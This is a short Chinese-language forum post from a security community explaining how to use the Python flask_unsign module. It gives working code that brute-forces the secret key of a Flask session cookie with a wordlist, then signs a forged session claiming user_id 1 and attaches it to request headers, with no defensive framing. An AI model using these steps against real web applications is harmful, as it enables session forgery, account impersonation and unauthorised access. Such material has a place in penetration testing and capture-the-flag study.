[原创] python 中的 flask_unsign 模块如何使用？-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创] python 中的 flask_unsign 模块如何使用？

发表于: 2023-2-13 16:24 6879

[原创] python 中的 flask_unsign 模块如何使用？

头像不好看了

2023-2-13 16:24

6879

作者：破符

模块的作用

有些web交互中的cookie是加密的，flask_unsign 模块的作用是字典爆破加密cookie的密钥。

模块下载

python -m pip install flask_unsign
 
python -m pip install flask_unsign_wordlist

模块使用

爆破cookie

from flask_unsign import Cracker
from flask_unsign import logger,DEFAULT_WORDLIST
 
crack = Cracker(value=cookie,salt=DEFAULT_SALT,threads=8)
with wordlist (DEFAULT_WORDLIST) as iterator:
                    crack.crack(iterator)
        if crack.secret:
            logger.success(f'Found secret key after {crack.attempts} attempts')
            session1 = ascii(crack.secret)        #如果session1有结果，则该值为爆破出来的私钥

利用私钥生成新的cookie

from flask_unsign import session
 
sec_session = session.sign(value="{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}",secret= session1,)        #secret若无特殊要求，值应为爆破cookie生成的session1
 
#sec_session值为cookie可添加入header头部

顺便提供一下交互用的头部，注意sec_session为新生成的cookie

{
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36',
            "Cookie" : "session="+sec_session
}

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

#基础知识 #工具脚本 #其他

收藏・0

免费・0

支持